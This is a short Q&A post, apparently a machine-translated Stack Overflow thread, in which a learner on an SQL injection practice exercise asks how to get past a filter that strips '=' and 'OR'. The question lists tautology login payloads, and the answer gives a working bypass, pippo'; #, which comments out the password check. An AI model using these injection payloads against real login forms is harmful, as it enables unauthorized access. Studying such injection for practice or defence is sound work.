我正在进行SQL注入练习,我无法绕过一个过滤器,无需替换(“”) = 和 OR 的出现。
网页有登录界面,执行的查询是:
SELECT user_id FROM users WHERE username='$username' and password='$password'
我的想法是将 pippo 作为用户传递, '或'a'='a'; - 作为密码,但当然使用该过滤器,我的字符串是无害的。
我还尝试了 '|| 'a'like'a'; - 但是,没有任何反应。一些建议?
答案 0 :(得分:-1)
在$ username中使用pippo'; #,在$ password中使用任何会导致此查询:
SELECT user_id FROM users WHERE username='pippo'; # ' and password='... anything ...'
完全绕过密码检查。